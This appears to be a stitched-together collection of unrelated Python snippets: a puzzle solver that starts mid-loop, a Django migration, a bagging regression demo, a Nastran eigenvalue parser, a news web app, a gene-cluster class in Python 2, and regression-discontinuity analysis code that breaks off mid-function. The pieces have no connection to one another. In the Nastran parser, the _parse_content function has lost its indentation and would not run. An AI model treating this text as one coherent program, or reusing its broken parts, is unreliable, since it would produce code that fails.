    (nw1, ne1, sw1, se1) = testsquare(s, testx, testy, wid, hei)
    #print(validx,validy,wiggle_dist,nw1,ne1,sw1,se1)
    if nw1 == True and ne1 == True and sw1 == True:
        #print("All true at",testx,testy)
        if wiggle_dist == 1:
            break
        wiggle_dist -= 1
        continue
    # Candidate 2: jump straight down (y only).
    testx = validx
    testy = validy+wiggle_dist
    (nw2, ne2, sw2, se2) = testsquare(s, testx, testy, wid, hei)
    if nw2 == True and ne2 == True and sw2 == True:
        if wiggle_dist == 1:
            break
        wiggle_dist -= 1
        continue
    # Candidate 3: jump straight right (x only).
    testx = validx+wiggle_dist
    testy = validy
    (nw3, ne3, sw3, se3) = testsquare(s, testx, testy, wid, hei)
    if nw3 == True and ne3 == True and sw3 == True:
        if wiggle_dist == 1:
            break
        wiggle_dist -= 1
        continue
    # No candidate fits yet: advance along whichever direction still has its
    # NW corner inside the beam, steering by which corners fell out.
    if nw1 == True:
        if ne1 == False and sw1 == False:
            validx = validx+wiggle_dist
            validy = validy+wiggle_dist
            continue
        if ne1 == False and nw1 == True:
            validx = validx
            validy = validy+wiggle_dist
            continue
        if ne1 == True and sw1 == False:
            validx = validx+wiggle_dist
            validy = validy
            continue
    if nw2 == True:
        validx = validx
        validy = validy+wiggle_dist
        print("2", (nw2, ne2, sw2, se2))
        continue
    if nw3 == True:
        validx = validx+wiggle_dist
        validy = validy
        continue
    if wiggle_dist == 1:
        print ("Wiggle stopping -- this is probably a problem")
    wiggle_dist -= 1
#print(validx,validy)
# Local refinement: greedily slide the square up/left while it still fits,
# so the reported square is the closest one to the emitter.
moved = True
while moved:
    moved = False
    for dirn in [(-2,-2),(-2,-1),(-1,-2),(-1,-1),(-2,0),(0,-2),(-1,0),(0,-1)]:
        testx = validx+dirn[0]
        testy = validy+dirn[1]
        (nw1, ne1, sw1, se1) = testsquare(s, testx, testy, wid, hei)
        if nw1 == True and ne1 == True and sw1 == True:
            validx = testx
            validy = testy
            moved = True
            break
print("Part 2:", validx*10000+validy)
|
# Generated by Django 3.2.5 on 2021-07-24 22:50
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Tighten dashboard field definitions: bounded grade, fixed group/year choices."""

    dependencies = [
        ('dashboard', '0002_rename_student_id_dashboard_student'),
    ]
    operations = [
        # grade: positive small integer constrained to the range 1..10
        migrations.AlterField(
            model_name='dashboard',
            name='grade',
            field=models.PositiveSmallIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)]),
        ),
        # group: single-letter choice A/B/C
        migrations.AlterField(
            model_name='dashboard',
            name='group',
            field=models.CharField(choices=[('A', 'Group A'), ('B', 'Group B'), ('C', 'Group C')], default='A', max_length=1),
        ),
        # year: single-digit choice 1/2/3
        migrations.AlterField(
            model_name='dashboard',
            name='year',
            field=models.CharField(choices=[('1', 'First year'), ('2', 'Second year'), ('3', 'Third year')], default='1', max_length=1),
        ),
    ]
|
# -*- coding: utf-8 -*-
__author__ = 'Jeonghun Yoon'
'''
I will implement 'Bagging'. I will use the 'Regression tree' as a base learner.
Output will be a average of results of base learners.
'''
# Modernized from Python 2: urllib.urlopen and sklearn.cross_validation no
# longer exist, and map() is lazy in Python 3.
import urllib.request
import random
from sklearn.model_selection import train_test_split  # was sklearn.cross_validation (removed in 0.20)
from sklearn.tree import DecisionTreeRegressor
from math import floor
import matplotlib.pyplot as plot

### 1. Load data from UCI repository and
xData = []
yData = []
f = urllib.request.urlopen("http://archive.ics.uci.edu/ml/machine-learning-databases/wine-quality/winequality-red.csv")

# Split titles and datas (HTTP body is bytes; decode before string handling)
lines = [raw.decode("utf-8") for raw in f.readlines()]
titles = lines[:1]
lines = lines[1:]
for line in lines:
    tokens = line.strip().split(';')
    # Extract target value (wine quality is the last column)
    yData.append(float(tokens[-1]))
    del(tokens[-1])
    # Extract data (materialize the floats; py2 map returned a list)
    xData.append([float(t) for t in tokens])

nData = len(xData)
nFeat = len(xData[0])

### 2. Divide data set into train set and test set! Why? avoid overfitting
xTrain, xTest, yTrain, yTest = train_test_split(xData, yData, test_size=0.3, random_state=531)
nTrain = len(xTrain)

# Set parameters for ensemble model
nBaseModel = 100   # number of bagged trees
treeDepth = 10     # depth cap of each regression tree
modelList = []
predList = []

# Extract samples for bagging (bag size as a fraction of the training set)
bagProp = 1
nBagSamples = int(len(xTrain) * bagProp)

### 3. Fit models
# Bootstrap Sampling (with replacement)
for iBaseModel in range(nBaseModel):
    sampIdx = sorted(random.choice(range(nTrain)) for _ in range(nBagSamples))
    xTrainBag = [xTrain[i] for i in sampIdx]
    yTrainBag = [yTrain[i] for i in sampIdx]
    baseModel = DecisionTreeRegressor(max_depth=treeDepth)
    # Fit a model (Previous models are independant to current fitting.)
    baseModel.fit(xTrainBag, yTrainBag)
    # Predict on test set
    pred = baseModel.predict(xTest)
    predList.append(pred)
    modelList.append(baseModel)

### 4. Assessment for these model.
# mse[k] = test MSE of the ensemble averaging the first k+1 trees.
mse = []
allPredictions = []
nModel = len(modelList)
for iModel in range(nModel):
    prediction = []
    # Prediction : average of models output
    for iPred in range(len(xTest)):
        pred = sum([predList[i][iPred] for i in range(iModel + 1)]) / (iModel + 1)
        prediction.append(pred)
    error = [(yTest[i] - prediction[i]) for i in range(len(yTest))]
    mse.append(sum([e * e for e in error]) / len(error))
    allPredictions.append(prediction)
nModelIdx = [i+1 for i in range(nModel)]

### 5. Plotting: MSE as a function of ensemble size
plot.figure()
plot.plot(nModelIdx, mse)
plot.axis("tight")
plot.xlabel("Number of Models in Ensemble")
plot.ylabel("Mean Squared Error")
plot.ylim((0.0, max(mse)))
plot.show()
print ("Minimum MSE")
print(min(mse))
import pandas as pd
import numpy as np
# Column names for the real-eigenvalue table of a Nastran .f06 file; only the
# KEYS are consumed (as DataFrame column labels) by read_modal_f06 below.
# NOTE(review): several value strings look mismatched with their keys
# ('EIGENVALUE' -> 'Velocity', 'RADIANS'/'CYCLES' -> 'Damping',
# 'GENERALIZEDMASS' -> 'Frequency') -- confirm against the solver output
# before using the values as display labels.
MODAL_REAL_EIGV_KEYS = {
    'MODE': 'Frequency',
    'EXTRACTIONORDER': 'Inverse Frequency',
    'EIGENVALUE': 'Velocity',
    'RADIANS': 'Damping',
    'CYCLES': 'Damping',
    'GENERALIZEDMASS': 'Frequency',
    'GENERALIZEDSTIFF': 'Real Eigenvalue',
}
def _parse_content(content):
data = []
for line in content:
entries = line.split()
inner_data = []
for entry in entries:
try:
e = float(entry)
except ValueError:
e = np.nan
finally:
inner_data.append(e)
data.append(inner_data)
return data
def read_modal_f06(filename: str):
    """Parse the real-eigenvalue table of a Nastran .f06 file into a DataFrame.

    Scans for the 'R E A L E I G E N V A L U E S' banner; data rows are
    expected to start 3 lines below it and end at a blank line or a page
    break (a line whose first character is '1').  If the banner occurs more
    than once, the last section wins (original behaviour preserved).

    Raises:
        ValueError: if no eigenvalue section is found (the original code
            raised a confusing NameError in that case).
    """
    with open(filename, 'r') as file:
        raw_lines = file.readlines()
    df = None
    for i, line in enumerate(raw_lines):
        if 'R E A L E I G E N V A L U E S' in line:
            raw_content = []
            j = i+3  # first data row sits 3 lines below the banner
            # stop at page break ('1' in column 1), blank line, or EOF
            # (the EOF guard fixes an IndexError when the table ends the file)
            while j < len(raw_lines) and raw_lines[j][0] != '1':
                l = raw_lines[j]
                if l.strip() == '':
                    break
                raw_content.append(l)
                j += 1
            parsed_data = _parse_content(raw_content)
            df = pd.DataFrame(parsed_data, columns=list(MODAL_REAL_EIGV_KEYS.keys()))
    if df is None:
        raise ValueError("no real-eigenvalue section found in %r" % filename)
    return df
|
import unittest
import sys
if sys.hexversion < 0x2070000:
    # Python 2.6's unittest lacks assertIsInstance; graft a compatible
    # implementation onto TestCase so tests can use it uniformly.
    def assertIsInstance(self, obj, cls, msg=None):
        """Same as self.assertTrue(isinstance(obj, cls)), with a nicer default message."""
        if isinstance(obj, cls):
            return
        self.fail('%r is not an instance of %r but is a %r' % (obj, cls, type(obj)))
    unittest.TestCase.assertIsInstance = assertIsInstance
|
"""
News
"""
import requests
import canopy
# Mount this module as a canopy branch; route templates may capture a
# {subreddit} path segment restricted to word characters.
app, kv, sql, view = canopy.branch(__name__, __doc__, subreddit=r"\w+")
# Base URL of Reddit's public JSON API (append ".json" or "r/<name>.json").
reddit_api = "https://reddit.com/"
@app.route(r"")
class News:
    def GET(self):
        """Render the combined news landing page: Hacker News plus Reddit."""
        hackernews_part = self.delegate(HackerNews)
        reddit_part = self.delegate(Reddit)
        return view.index(hackernews_part, reddit_part)
@app.route(r"HackerNews")
class HackerNews:
    # Official Hacker News Firebase-backed API base URL.
    # BUG FIX: the original referenced a module-level `hn_api` that was never
    # defined anywhere in the file (NameError at request time).
    hn_api = "https://hacker-news.firebaseio.com/v0/"

    def GET(self):
        """Fetch and render the current top 25 Hacker News stories."""
        top_post_ids = requests.get(self.hn_api + "topstories.json").json()[:25]
        top = [requests.get(self.hn_api + "item/{}.json".format(post_id)).json()
               for post_id in top_post_ids]
        return view.hackernews.index(top)
@app.route(r"Reddit")
class Reddit:
    def GET(self):
        """Render Reddit's front page together with the tracked subreddits."""
        front_page = requests.get(reddit_api + ".json").json()
        tracked = ("python",)
        subreddits = [self.delegate(SubReddit, subreddit=name) for name in tracked]
        return view.reddit.index(front_page, subreddits)
@app.route(r"Reddit/{subreddit}")
class SubReddit:
    def GET(self):
        """Render the listing for the subreddit named in the URL path."""
        listing_uri = reddit_api + "r/{}.json".format(self.subreddit)
        listing = requests.get(listing_uri).json()
        return view.reddit.subreddit(listing)
|
#! /usr/bin/env python
from datetime import datetime
# Stamp the current wall-clock time at the start of the ADC data file.
# Uses a context manager so the handle is closed even if the write fails.
# 'r+' overwrites the first bytes in place without truncating the rest.
# NOTE(review): 'r+' requires the file to already exist -- confirm intended.
with open('/home/pi/ESW/Pilot_1.x.x/ADC/datavalues.txt', 'r+') as f:
    f.write(str(datetime.now()))
|
# Goal
#
# Create a program that prints out a multiplication table for the numbers 1 through 9. It should include the numbers 1 through 9 on the top and left axises, and it should be relatively easy to find the product of two numbers. Do not simply write out every line manually (ie print('7 14 21 28 35 49 56 63') ).
#
# Subgoals
#
# As your products get larger, your columns will start to get crooked from the number of characters on each line. Clean up your table by evenly spacing columns so it is very easy to find the product of two numbers.
#
# Allow the user to choose a number to change the size of the table (so if they type in 12, the table printed out should be a 12x12 multiplication table).
# Build an N x N multiplication table; every product is right-aligned in a
# 5-character cell so the columns stay straight as numbers grow.
maximum_number = int(input("Enter your highest number > ")) + 1
for row in range(1, maximum_number):
    cells = ("{:5}".format(row * col) for col in range(1, maximum_number))
    print("".join(cells), end = "", flush=True)
    print("")
|
from collections import Counter
from numpy import power
from numpy import log
from numpy import nan_to_num, prod
from Bio import SeqIO
import sh
import os
import shutil
class GeneCluster(object):
    """A cluster of putatively homologous genes spanning several genomes.

    Belongs to a parent `clustering` object, which supplies genome metadata
    and lookup maps (`genomes`, `id2name_map`, `completnesses`, `genome2len`,
    `rev_name_map`).  NOTE: this is Python 2 code (print statement,
    dict.has_key, iteritems).
    """

    def __repr__(self): return '<%s object %s, annotated as %s with %i genes from %i genomes>' % (self.__class__.__name__, self.name, self.annotation, len(self.genes), len(self.genomes))

    def __init__(self, clustering , genes, name = None, annotation = None ):
        # `genes` is either an export dict (round-trip via to_dict/from_dict)
        # or a list of "genome|gene" identifier strings.
        self.clustering = clustering
        self.coreness = None
        # gene ids excluded when extracting sequences
        self.black_list = []
        if type(genes) == dict :
            self.from_dict(genes)
            print "Don't forget to repair"
        else:
            self.name = name
            self.from_list(genes, annotation)

    def to_dict(self):
        # Serializable snapshot of the cluster state (inverse of from_dict).
        return {u'name': self.name, u'annot_fraction': self.annot_fraction, u'annotation': self.annotation, u'genes': self.genome_2_gene_map, u'mapping': self.mapping, "coreness" : self.coreness}

    def from_dict(self,imp):
        # Rebuild state from a dict produced by to_dict().
        self.name = imp['name']
        self.genes = imp['mapping'].keys()
        self.genomes = imp['genes'].keys()
        self.genome_2_gene_map = imp['genes']
        self.annotation = imp['annotation']
        self.annot_fraction = imp['annot_fraction']
        self.mapping = imp['mapping']
        # older exports may predate the coreness field
        self.coreness = imp['coreness'] if imp.has_key('coreness') else None

    def from_list(self, genes, annotation):
        # Build state from "genome|gene" strings.  If no annotation is given,
        # vote one from the clustering's id->name map (majority wins).
        self.genomes = list(set([g.split("|")[0] for g in genes]))
        self.genes = [g.split("|")[1] for g in genes]
        self.genome_2_gene_map = {go : [ge.split("|")[1] for ge in genes if go == ge.split("|")[0]] for go in self.genomes}
        if annotation:
            self.annotation = annotation
            self.annot_fraction = None
            self.mapping = None
        else :
            sub_dict = {g : self.clustering.id2name_map[g] for g in self.genes}
            name_counts = Counter(sub_dict.values())
            total = sum([name_counts[z] for z in name_counts])
            # fraction of genes agreeing with the majority annotation
            annot_frac = float(name_counts.most_common()[0][1])/float(total)
            self.annotation = name_counts.most_common(1)[0][0]
            self.annot_fraction = annot_frac
            self.mapping = sub_dict
#        self.coreness = self.compute_coreness()

    def to_sequences(self, short=False, genome_name = False, subset = None):
        # Collect Bio.SeqRecord objects for this cluster's genes by re-reading
        # each genome's proteome FASTA; black-listed gene ids are skipped.
        if not subset:
            subset = set(self.genomes)
        seqs = []
        for g in self.genomes:
            if g in subset:
                genome = [ gg for gg in self.clustering.genomes if gg.metadata['short_name'] == g][0]
                with open(genome.proteom, "r") as handle:
                    t_seqs = [s for s in SeqIO.parse(handle, "fasta") if s.id in self.genes and not s.id in self.black_list ]
                if genome_name:
                    # relabel records by genome rather than gene id
                    for s in t_seqs:
                        s.id = genome.metadata['short_name']
                        s.name = genome.metadata['short_name']
                if short:
                    for s in t_seqs:
                        s.description = ""
                seqs += t_seqs if t_seqs else []
        return seqs

    def calc_checksum(self, s):
        # position-weighted character sum of `s`, returned as a string
        return str(sum(ord(c)*i for i,c in enumerate(s)))

    def align(self,output_file, block = True, genome_names = True, subset = None):
        # Align the cluster's sequences with muscle and, if `block`, filter the
        # alignment with Gblocks.  Returns 1 on success, 0 when Gblocks
        # produced no output.
        # NOTE(review): uses fixed temp file names in the CWD -- not safe to
        # run concurrently.
        if not subset:
            subset = self.genomes
        with open("temp.faa","w") as unalign:
            temp_seqs = self.to_sequences(short=True, genome_name = genome_names, subset = subset)
            SeqIO.write(temp_seqs, unalign, "fasta")
        sh.muscle("-in", "temp.faa","-out", "temp_aligned.faa")
        os.remove("temp.faa")
        if block:
            try:
                sh.Gblocks("temp_aligned.faa", "-t=p", "-b5=h", "-b4=2", "-b2=0", "-b3=2000", "-b1=0.3")
            except:
                # Gblocks can exit non-zero even on success; the real outcome
                # is checked via the output file just below
                pass
            if os.path.exists("temp_aligned.faa-gb.htm"):
                shutil.move("temp_aligned.faa-gb", output_file)
                os.remove("temp_aligned.faa-gb.htm")
#                sh.seqret("-sequence", "temp_aligned.faa", "-outseq", "nexus:" + ".".join(output_file.split(".")[:-1]) + ".nex")
                os.remove("temp_aligned.faa")
                return 1
            else :
                return 0
        else:
            # no Gblocks: export a nexus copy and move the raw alignment
            sh.seqret("-sequence", "temp_aligned.faa", "-outseq", "nexus:" + ".".join(output_file.split(".")[:-1]) + ".nex")
            shutil.move("temp_aligned.faa", output_file)
            return 1

    def tree_construction(self,alignment, outputtree):
        # Build an approximate-ML tree from the alignment with FastTree.
        sh.FastTree("-out", outputtree, alignment)

    def core_probability(self):
        # Likelihood of the observed presence/absence pattern if the cluster
        # is core: present genomes weighted by completeness, absences by
        # (1 - completeness).
        present = prod([self.clustering.completnesses[self.clustering.rev_name_map[g]] for g in self.genomes])
        abscent = prod([1-v for k,v in self.clustering.completnesses.iteritems() if k not in self.genomes and k in self.clustering.genome2len.keys()])
        return present*abscent

    def non_core_probability(self):
        # Likelihood of the same pattern under a random (non-core) model,
        # where hit probability scales with each genome's gene count.
        prob_of_random_pres = lambda g: 1.0 - power(float(len(self.clustering)-1)/len(self.clustering) , self.clustering.genome2len[self.clustering.rev_name_map[g]])
        prob_of_random_absc = lambda g: power(float(len(self.clustering)-1)/len(self.clustering) , self.clustering.genome2len[self.clustering.rev_name_map[g]])
        present = prod([prob_of_random_pres(g) for g in self.genomes])
        abscent = prod([prob_of_random_absc(k) for k in self.clustering.genome2len.keys() if k not in self.genomes])
        return present*abscent

    def non_core_probability_plural(self):
        # Variant of the random model that accounts for the cluster's own
        # gene count relative to the pooled gene total.
        prob_of_random_pres = lambda g: 1.0 - power(float(sum(self.clustering.genome2len.values())-len(self.genes))/sum(self.clustering.genome2len.values()) , self.clustering.genome2len[g])
        prob_of_random_absc = lambda g: power(float(sum(self.clustering.genome2len.values())-len(self.genes))/sum(self.clustering.genome2len.values()) , self.clustering.genome2len[g])
        present = prod([prob_of_random_pres(g) for g in self.genomes])
        abscent = prod([prob_of_random_absc(k) for k in self.clustering.genome2len.keys() if k not in self.genomes])
        return present*abscent

    def compute_coreness(self) :
        # log-odds of core vs non-core model; > 0 favours "core"
        return log(self.core_probability()/self.non_core_probability())
|
import pandas as pd
import os
import seaborn as sns
import matplotlib.pyplot as plt
import numpy as np
from stargazer.stargazer import Stargazer
from scipy.stats import ttest_ind
from tabulate import tabulate
import statsmodels.formula.api as smf
def get_data():
    """Load the forced-attendance replication data and add derived columns.

    Adds:
        treat  -- 1 when first-year GPA is strictly below the cutoff of 7
        firstyeargpa_centered -- running variable, sign-flipped around 7
        passcourse -- 1 when the course grade reaches the 5.5 pass mark
    """
    df = pd.read_stata("data/ReplicationDataset_ThePriceofForcedAttendance.dta")
    df["grade"] = df["grade"].astype(float)
    # treatment indicator: below the GPA-7 cutoff
    df["treat"] = (df["firstyeargpa"] < 7).astype(int)
    # centered running variable (positive below the cutoff)
    df["firstyeargpa_centered"] = 7 - df["firstyeargpa"]
    # pass indicator
    df["passcourse"] = (df["grade"] >= 5.5).astype(int)
    return df
def get_variable_description(df):
    """Return a styled table describing every column of *df*.

    The Description strings are positional: they must stay aligned with the
    order of df.columns (11 entries expected, matching get_data()'s output).
    """
    df_var = {"Variable": df.columns.values, "Type": df.dtypes,
              "Description":["unique student identifier","cohorts ranging from 2008 to 2014",
                             "attendance policy for above-7 students (voluntary, encouraged or forced)",
                             "second-year grades",
                             "second-year grades standardized","stdgrade of the abolition cohort",
                             "attendance rate of tutorials", "first-year average grade",
                             "indicator if first-year gpa was below 7",
                             "first-year average grade centered around 7",
                             "indicator if a second-year course was passed"]}
    df_var = pd.DataFrame(df_var, columns=["Variable","Type","Description"])
    return df_var.style.hide_index()
def get_truncated_data(df,bandwidth,cohort,coursetype):
    """Return the subset of *df* selected by cohort, GPA bandwidth, course type.

    Parameters:
        df        -- frame with 'cohort', 'firstyeargpa', 'coursepolicy' columns
        bandwidth -- half-width around the GPA cutoff of 7, or "total range"
        cohort    -- 1 (pre-abolition, cohort < 6), 6 (abolition cohort),
                     or "all cohorts"
        coursetype -- "all courses" or "voluntary"/"encouraged"/"forced"

    The index is reset in place on the returned frame.
    BUG FIX: with cohort == "all cohorts" the original never bound the working
    frame and raised NameError; it now uses a copy of the full frame (a copy so
    the in-place reset_index cannot mutate the caller's df).
    """
    if cohort==1:
        df_temp = df.loc[df["cohort"] < 6]
    elif cohort==6:
        df_temp = df.loc[df["cohort"] == 6]
    elif cohort== "all cohorts":
        df_temp = df.copy()  # was `pass` -> NameError below
    if bandwidth == "total range":
        pass
    else:
        df_temp = df_temp.loc[df_temp["firstyeargpa"]<=7 + bandwidth]
        df_temp = df_temp.loc[df_temp["firstyeargpa"]>=7 - bandwidth]
    if coursetype == "all courses":
        pass
    elif coursetype in ["voluntary","encouraged","forced"]:
        df_temp = df_temp.loc[df_temp["coursepolicy"]== coursetype]
    df_temp.reset_index(inplace=True)
    return df_temp
def get_table1(df,bandwidth):
    """Print descriptive statistics (Table 1) for grades and attendance.

    Compares the treated group (treat == 1, GPA below 7) with the control
    group (treat == 0) inside the given bandwidth: means, standard
    deviations, group sizes, and two-sample t-test p-values.
    """
    ### mean and differences:
    # groupby sorts keys, so index 0 is treat == 0 (control, GPA >= 7)
    att_mean0,att_mean1 = round(df.groupby("treat")["attendance"].mean(),3)
    att_diff = round(att_mean0 - att_mean1,3)
    grade_mean0,grade_mean1 = round(df.groupby("treat")["grade"].mean(),3)
    grade_diff = round(grade_mean0 - grade_mean1,3)
    ### standard deviations:
    att_sd0, att_sd1 = round(df.groupby("treat")["attendance"].std(),3)
    grade_sd0, grade_sd1 = round(df.groupby("treat")["grade"].std(),3)
    ### number of observations:
    num_ind = df["treat"].value_counts()
    num_ind[2] = num_ind[1] + num_ind[0]  # slot 2 holds the total
    ### t-test of different means:
    diff_stat = np.empty(2)
    var = ["attendance","grade"]
    for i,column in enumerate(var):
        treated = df.query("treat == 1")[column]
        control = df.query("treat == 0")[column]
        diff_stat[i] = round(ttest_ind(treated, control)[1],3)
    ### table:
    info = [["Variable | First-year GPA:",f" [{7-bandwidth},7.0]",f"[7,{7+bandwidth}]","Difference","p-value"]
            ,["Course level (second year)","","","",""]
            ,["Grade","","","",""]
            ,["mean",grade_mean1,grade_mean0,grade_diff,diff_stat[1]]
            ,["standard deviation",grade_sd1,grade_sd0,"",""]
            ,["","","","","",""]
            ,["Tutorial attendance","","","",""]
            ,["mean",round(att_mean1,3),round(att_mean0,3),att_diff,diff_stat[0]]
            ,["standard deviation",round(att_sd1,3),round(att_sd0,3),"",""]
            ,["","","","","",""]
            ,["Observations",num_ind[1],num_ind[0],num_ind[2],""]]
    print(tabulate(info ,headers='firstrow',tablefmt='fancy_grid'))
def collect_each_student(df):
    """Collapse course-level rows to one row per student (id + first-year GPA).

    Rows belonging to the same student are assumed to be consecutive: the
    first row of each run of identical studentid values is kept (a later,
    non-adjacent reappearance of an id would be collected again, matching
    the original behaviour).
    """
    ids = [df["studentid"][0]]
    gpas = [df["firstyeargpa"][0]]
    for row in range(1, len(df)):
        if df["studentid"][row - 1] != df["studentid"][row]:
            ids.append(df["studentid"][row])
            gpas.append(df["firstyeargpa"][row])
    collected = pd.DataFrame(ids, columns=["studentid"])
    collected["firstyeargpa"] = gpas
    return collected
def plot_gpahisto(df,bins):
    """Draw a histogram of first-year GPA with the cutoff at 7 marked in red."""
    plt.figure(figsize=(10, 6))
    plt.hist(df["firstyeargpa"], bins=bins)
    plt.axvline(x=7, color='r')  # regression-discontinuity cutoff
    plt.title("Histogram of First Year GPA")
    plt.xlabel("First-year GPA")
    plt.ylabel("Number of observations")
def get_subsetvol(cohort,df):
    """Voluntary-attendance courses for one cohort group.

    cohort is "1to5" (pre-abolition cohorts, cohort < 6) or "6" (abolition
    cohort).  The index of the returned frame is reset in place.
    """
    if cohort == "1to5":
        subset = df.loc[df["cohort"] < 6]
    if cohort == "6":
        subset = df.loc[df["cohort"] == 6]
    subset = subset.loc[subset["coursepolicy"] == "voluntary"]
    subset.reset_index(inplace=True)
    return subset
def get_bins_func(df,variable,coursetype):
    """Local averages of *variable* in 20 GPA bins of width 0.05 over [6.5, 7.5).

    Computed on the pre-abolition cohorts (cohort < 6) restricted to
    *coursetype*.  Returns (bin means, bin observation counts), each shaped
    (20, 1); empty bins yield NaN means.
    """
    mean_loc = np.zeros((20,1))
    numobs_loc = np.zeros((20,1))
    pos_loc = np.zeros((20,1))  # kept for parity with the original (unused)
    sample = get_truncated_data(df,"total range",1,coursetype)
    for i, lower in enumerate(np.arange(6.5,7.5,0.05)):
        in_bin = sample.loc[(sample["firstyeargpa"] >= lower)
                            & (sample["firstyeargpa"] < lower + 0.05)]
        mean_loc[i] = in_bin[variable].mean()
        numobs_loc[i] = len(in_bin)
    return(mean_loc, numobs_loc)
def get_figure1_1(df,coursetype):
    """Plot Figure 1 (binned-average variant): attendance and grades vs GPA.

    Left panel: attendance rate; right panel: standardized grades.  Scatter
    points are 0.05-wide GPA bin means (marker size = bin count); blue lines
    are linear fits on bins 3..17 on each side of the cutoff, grey curves are
    cubic fits per side, all fitted to the BINNED means.
    NOTE(review): the grade bins are always computed on "voluntary" courses
    regardless of *coursetype* -- confirm this is intended.
    """
    ### get positions of local averages
    pos_loc = np.zeros((20,1))
    for i, xlow in enumerate(np.arange(6.5,7.5,0.05)):
        pos_loc[i,0] = xlow+0.05/2  # bin midpoints
    ### attendance results
    att_mean_loc, att_numobs_loc = get_bins_func(df,"attendance",coursetype)
    m_left, b_left = np.polyfit(pos_loc[3:10,0], att_mean_loc[3:10,0], 1)
    m_right, b_right = np.polyfit(pos_loc[10:18,0], att_mean_loc[10:18,0], 1)
    m3_left2, m2_left2, m1_left2, b_left2 = np.polyfit(pos_loc[:10,0], att_mean_loc[:10,0], 3)
    m3_right2, m2_right2, m1_right2, b_right2 = np.polyfit(pos_loc[10:,0], att_mean_loc[10:,0], 3)
    ### stdgrade results
    std_mean_loc, std_numobs_loc = get_bins_func(df,"stdgrade","voluntary")
    m_left1, b_left1 = np.polyfit(pos_loc[3:10,0], std_mean_loc[3:10,0], 1)
    m_right1, b_right1 = np.polyfit(pos_loc[10:18,0], std_mean_loc[10:18,0], 1)
    m3_left22,m2_left22, m1_left22, b_left22 = np.polyfit(pos_loc[:10,0], std_mean_loc[:10,0], 3)
    m3_right22,m2_right22, m1_right22, b_right22 = np.polyfit(pos_loc[10:,0], std_mean_loc[10:,0], 3)
    ### plot both graphs
    fig, ax = plt.subplots(1,2,figsize=(14, 6))
    plt.subplots_adjust(wspace=0.5)
    plt.subplot(121)
    plt.title(f"Attendance in {coursetype} courses")
    ax = plt.scatter(pos_loc, att_mean_loc[:,0],s = att_numobs_loc[:,0], facecolors='black', edgecolors='black')
    plt.ylim(0.4,1)
    plt.axvline(x=7, color='r')
    # plot the locally fitted linear regression line:
    plt.plot(pos_loc[3:10,0], m_left*pos_loc[3:10,0]+b_left,color="b")
    plt.plot(pos_loc[10:18,0], m_right*pos_loc[10:18,0]+b_right, color="b")
    # plot the locally fitted cubic regression line:
    plt.plot(pos_loc[:10,0], m1_left2*pos_loc[:10,0] + m2_left2*((pos_loc)**2)[:10,0]+ m3_left2*((pos_loc)**3)[:10,0] +b_left2, color="grey")
    plt.plot(pos_loc[10:,0], m1_right2*pos_loc[10:,0] + m2_right2*((pos_loc)**2)[10:,0]+m3_right2*((pos_loc)**3)[10:,0] +b_right2, color="grey")
    plt.xlabel('1st-year GPA')
    plt.ylabel('Attendance rate')
    plt.subplot(122)
    plt.title(f"Grades in {coursetype} courses")
    ax = plt.scatter(pos_loc, std_mean_loc[:,0],s = std_numobs_loc[:,0], facecolors='black', edgecolors='black')
    plt.ylim(-0.5,0.5)
    plt.axvline(x=7, color='r')
    # plot the locally fitted linear regression line:
    plt.plot(pos_loc[3:10,0], m_left1*pos_loc[3:10,0]+b_left1,color="b")
    plt.plot(pos_loc[10:18,0], m_right1*pos_loc[10:18,0]+b_right1, color="b")
    # plot the locally fitted cubic regression line:
    plt.plot(pos_loc[:10,0], m1_left22*pos_loc[:10,0] + m2_left22*((pos_loc)**2)[:10,0]+ m3_left22*((pos_loc)**3)[:10,0] +b_left22, color="grey")
    plt.plot(pos_loc[10:,0], m1_right22*pos_loc[10:,0] + m2_right22*((pos_loc)**2)[10:,0]+ m3_right22*((pos_loc)**3)[10:,0] +b_right22, color="grey")
    plt.xlabel('1st-year GPA')
    plt.ylabel('Grades (standardized)')
    plt.plot()
def get_figure1_2(df,coursetype):
    """Plot Figure 1 (microdata-fit variant): attendance and grades vs GPA.

    Same panels as get_figure1_1, but the regression lines are fitted to the
    individual observations: linear fits on the 0.3-bandwidth sample, cubic
    fits on the 0.5-bandwidth sample; the binned means are drawn as hollow
    markers for reference.
    BUG FIX: the cubic-fit samples X_L3/X_R3 sliced `df_reg` (0.3 bandwidth)
    although `df_reg3` (0.5 bandwidth) was built for exactly that purpose;
    they now slice df_reg3.
    NOTE(review): grade bins are always computed on "voluntary" courses
    regardless of *coursetype* -- confirm intended.
    """
    ### get positions of local averages
    pos_loc = np.zeros((20,1))
    for i, xlow in enumerate(np.arange(6.5,7.5,0.05)):
        pos_loc[i,0] = xlow+0.05/2  # bin midpoints
    df_reg = get_truncated_data(df,0.3,1,coursetype)
    X_L = df_reg.loc[df_reg["treat"]==1]
    X_R = df_reg.loc[df_reg["treat"]==0]
    df_reg3 = get_truncated_data(df,0.5,1,coursetype)
    X_L3 = df_reg3.loc[df_reg3["treat"]==1]  # FIX: was df_reg
    X_R3 = df_reg3.loc[df_reg3["treat"]==0]  # FIX: was df_reg
    ### attendance results
    att_mean_loc, att_numobs_loc = get_bins_func(df,"attendance",coursetype)
    m_left, b_left = np.polyfit(X_L["firstyeargpa"],X_L["attendance"],1)
    m_right, b_right = np.polyfit(X_R["firstyeargpa"],X_R["attendance"],1)
    m3_left2, m2_left2, m1_left2, b_left2 = np.polyfit(X_L3["firstyeargpa"],X_L3["attendance"], 3)
    m3_right2, m2_right2, m1_right2, b_right2 = np.polyfit(X_R3["firstyeargpa"],X_R3["attendance"], 3)
    ### stdgrade results
    std_mean_loc, std_numobs_loc = get_bins_func(df,"stdgrade","voluntary")
    m_left1, b_left1 = np.polyfit(X_L["firstyeargpa"],X_L["stdgrade"],1)
    m_right1, b_right1 = np.polyfit(X_R["firstyeargpa"],X_R["stdgrade"],1)
    m3_left22,m2_left22, m1_left22, b_left22 = np.polyfit(X_L3["firstyeargpa"],X_L3["stdgrade"], 3)
    m3_right22,m2_right22, m1_right22, b_right22 = np.polyfit(X_R3["firstyeargpa"],X_R3["stdgrade"], 3)
    ### plot both graphs
    fig, ax = plt.subplots(1,2,figsize=(14, 6))
    plt.subplots_adjust(wspace=0.5)
    plt.subplot(121)
    plt.title(f"Attendance in {coursetype} courses")
